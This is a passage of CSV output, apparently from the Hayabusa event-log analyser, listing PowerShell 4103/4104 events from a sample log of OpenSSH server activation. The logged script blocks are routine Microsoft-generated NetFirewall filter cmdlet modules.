[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.300 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.301 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 
'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query 
(cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() 
if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
(@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.340 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
